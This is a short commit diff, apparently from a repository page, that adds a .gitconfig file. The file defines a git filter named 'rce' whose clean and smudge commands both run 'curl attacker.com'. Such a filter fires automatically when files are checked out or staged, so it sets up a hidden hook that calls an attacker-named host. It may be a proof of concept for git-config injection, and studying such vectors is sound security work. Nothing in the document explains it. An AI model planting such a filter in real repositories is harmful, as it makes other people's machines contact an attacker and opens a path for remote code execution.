add gitconfig
Browse files- .gitconfig +3 -0
.gitconfig
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
[filter "rce"]
|
| 2 |
+
clean = curl attacker.com
|
| 3 |
+
smudge = curl attacker.com
|